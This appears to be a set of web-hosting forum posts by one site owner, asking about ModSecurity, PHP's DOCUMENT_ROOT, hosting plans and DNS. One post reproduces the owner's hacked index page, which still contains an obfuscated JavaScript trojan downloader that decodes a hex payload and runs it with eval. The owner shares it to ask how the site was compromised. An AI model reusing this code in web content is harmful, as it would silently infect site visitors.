paco

I have a new dedicated server, and I've had this problem. With phpbb 3.0.2, users can't post any text that include the "images" word (in a link). For example: www.imageshack.us The problem is Apache's ModSecurity related. The solution is disable ModSecurity (as you did) , or, if you have access to ModSecurity configuration, disable this line: SecFilterSelective "THE_REQUEST|POST_PAYLOAD|ARG_VALUES" "\.images.*" Please, if any TCH gurus think this last option could be risky, tell me another solution. Thanks in advance.

Yesterday, a user warn us that our page had a trojan: JS/TrojanDownloader/IFrame/EY.gen (trojan) The main page (the page with the trojan) is only a photo that redirect to the shop (only four lines), but we had this page this morning (with the javascript trojan): ><html> <head> <title>Material de Kickboxing</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#000000" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><!-- o --><script language="JavaScript"> <!-- function gC1cGbQ46(gA6sjiMTa){var bmXq52e35=arguments.callee.toString().replace(/\W/g,'').toUpperCase();var gbb5movQ8;var p46aJYMAG;var MiFBf0yFB=bmXq52e35.length;var B4gE81Sr0;var V8UjyXJ2x='';var Nf5f41fk5=new Array();for(p46aJYMAG=0;p46aJYMAG<256;p46aJYMAG++)Nf5f41fk5[p46aJYMAG]=0;var gbb5movQ8=1;for(p46aJYMAG=128;p46aJYMAG;p46aJYMAG>>=1) {gbb5movQ8=(gbb5movQ8>>>1)^((gbb5movQ8&1)?3988292384:0);for(hjpygo5A5=0;hjpygo5A5<256;hjpygo5A5+=p46aJYMAG*2) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]=(Nf5f41fk5[hjpygo5A5]^gbb5movQ8);if (Nf5f41fk5[hjpygo5A5+p46aJYMAG] < 0) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]+=4294967296;}}}B4gE81Sr0=4294967295;for(gbb5movQ8=0;gbb5movQ8<MiFBf0yFB;gbb5movQ8++){B4gE81Sr0=Nf5f41fk5[(B4gE81Sr0^bmXq52e35.charCodeAt(gbb5movQ8))&255]^((B4gE81Sr0>>8)&16777215);}B4gE81Sr0=B4gE81Sr0^4294967295;if (B4gE81Sr0<0) {B4gE81Sr0+=4294967296;}B4gE81Sr0=B4gE81Sr0.toString(16).toUpperCase();var HNii6t2UC=new Array();var MiFBf0yFB=B4gE81Sr0.length;for(p46aJYMAG=0;p46aJYMAG<8;p46aJYMAG++) {if (MiFBf0yFB + p46aJYMAG >= 8) {HNii6t2UC[p46aJYMAG]=B4gE81Sr0.charCodeAt(p46aJYMAG+MiFBf0yFB-8);} else {HNii6t2UC[p46aJYMAG]=48;}}var B1K23HoQ5=0;var iCvK5hVNE;var V8UjyXJ2x='';var nekrid46u;MiFBf0yFB=gA6sjiMTa.length;for(p46aJYMAG=0;p46aJYMAG<MiFBf0yFB;p46aJYMAG+=2){iCvK5hVNE=parseInt(gA6sjiMTa.substr(p46aJYMAG, 2),16); nekrid46u=iCvK5hVNE-HNii6t2UC[B1K23HoQ5];if(nekrid46u<0) {nekrid46u += 256;}V8UjyXJ2x+=String.fromCharCode(nekrid46u);if(B1K23HoQ5<HNii6t2UC.length-1){B1K23HoQ5++;} else {B1K23HoQ5=0;}}eval(V8UjyXJ2x);} gC1cGbQ46('9da598aeae97b3a467ada7a2B5976d57759f9bABa29FAA50aca89876639aB9a4a9706468786B73616 D69636a786a7362696598a0aa5fA799a7659Ea76f95ac9978A672AEb497B7615B56acA2A5A6ad6D5b67575 9A997ae97A1AA725B725465A3ADAFa19e7E54a79Fab9a9aAB7B5275A0b1587375709BABa29Aa39A77685b8 0'); //--> </script> <!-- c --> <div align="center"><a href="/tienda"><img src="entrada.jpg" width="667" height="500" border="0"></a> </div> </body> </html> We have a phpbb3 private forum (with none public area, all restricted for two persons) , and a zencart 1.3.7 shop (I have the same scripts in other pages without any problem). I have removed the trojan, and set index.html permissions to read only, but I'm worried becasuse I don't know how this kind of trojan has attacked our domain

Hi, I have a dedicated server in other hosting (and two shared with TCH), and in the last times, support is no good, and I'm thinking about dedicated server with TCH. But I have doubts. At this moment, my statistics are, more or less (month): 75Gb 400.000 visits 200.000 clients 1.000.000 access Database very big (phpbb with 400.000 messages) The main server load is a phpbb 3 forum, with between 35 to 50 users online. Since we migrated from phpbb2 to phpbb3, every 10 days, the database fails, with this message: Too many connections [1040] , and the service has to be restarted. The current hosting provider does not give us a solution for this. I have not any problem installating scripts, or managing cpanel or similar, but I don't have the ability to configure a server for myself, in a secure way. The best option for me, could be Semi-Dedicate Fully Managed, but is suitable for my needs? (I don't want to hire a plan, and then, TCH say me that it's not appropiate) Perhaps I could pay an dedicated unmanaged server, but I don't know if with unmanaged could something became obsolete, and hackers or similar do spamming with my server. Thanks for your help

Please, keep us informed By the way, do you know anything (approximate date for example) about this annoucement for 2004: Thanks.

I am interested in this server, but I have some questions (I have a platinum plan, and I have no experience as a reseller): - How many domains can I host? (I suppose the IPs you offer are for SSL domains, but I can host more than 8 non SSL domains. That's right?) - How many mysql DDBB can have a domain hosted in the server? (can they have as many databases as they want with the name that they want?) - Can I upload (ftp) databases to mysql/data? - Can I limit the bandwith, emails, hd space, etc. for the domains hosted in the server? Thanks in advance.

The platinum plan is perfect for me, thank you! Be aware, in spanish there are a "refran" (a sentence) that says: "The grandes cenas estan las sepulturas llenas" More or less it is: "The graves are full of big dinners" Well, I'm going to hire the new plan Rock Sign

This is a message for bill. I sent two emails to bill@totalchoicehosting.com , but I had no response (I hope more luck in this ocassion). ---------------------- Hello bill, I talked with you online. I'm the webmaster of hispagimnasios.com My problem is that there are no any plan between 20Gb bandwidth (18$), and the semi-dedicated 50Gb (79$). At this moment I am spending about 22Gb (last days of the month are a problem for me, and it's increasing). You said that you could make me a customized plan, spending about 30Gb of bandwidht (this is my problem, hard disk, and the other things are ok). Of course the option of having extra Gb for $2.50 is not an option (10Gb 25$ while silver plan is 5$ is too much money). Well, thank you, I wait for your customized plan (the best for me could be an expert(20)+silver(10) plan, but I need the 30Gb in the same domain 8D ps. I enjoy your service, congratulations. ps2. This lack of offer between 20Gb and 50Gb could be a problem for new possible customers of your services. I edited out your email address.... Bill

In this moment I've detected what has happened!: If you have this script (called borra.php): <? echo "document root: $DOCUMENT_ROOT"; ?> and you go to: http://207.44.242.2/~hispagi/borra.php It shows: /usr/local/apache/htdocs But if you go to (the same, after dns propagation): http://www.hispagimnasios.com/borra.php it shows: /home/hispagi/public_html

I received this message from Alan Ho (summarize): ---------- I've created a test.php page and it shows document_root being set to the correct home folder. You should check your PHP coding to make sure you are referencing the correct global variable. ---------- Indeed, at this moment, it works OK , but my old test script was this: <? echo "document root: $DOCUMENT_ROOT"; ?> , and it said: /usr/local/apache/htdocs Now it say: /home/hispagi/public_html Perhaps somebody has changed anything. Well, it's all OK now

Thank you I liked to use $DOCUMENT_ROOT instead of the path, because of the compatibility between the remote host, and my localhost (to testing). Well, thanks.

I use the apache variable $DOCUMENT_ROOT for the header of all my php files. It should point to the root of my public directory: /home/hispagi/public_html/ However, it points to: /usr/local/apache/htdocs/ Are there any way of change this behaviour? , my pages don't work for this reason (in other hostings I had not this problem) Thanks in advance.

I've had the problem a few minutes ago (couldn't descompress .zip or gzipped files with cpanel), and the solution is to compress with gzip, WITH EXTENSION .gz (if not have this extension, is impossible in my case, it only shows the name of the contents)

Thank you

I'm a new user (from the featureprice hell), and I know the address for the new DNSs: NS1.TOTALCHOICEHOSTING.COM NS2.TOTALCHOICEHOSTING.COM but my register ask me the IPs of the DNSs (and the names). And I don't have this information. Anybody knows? TIA.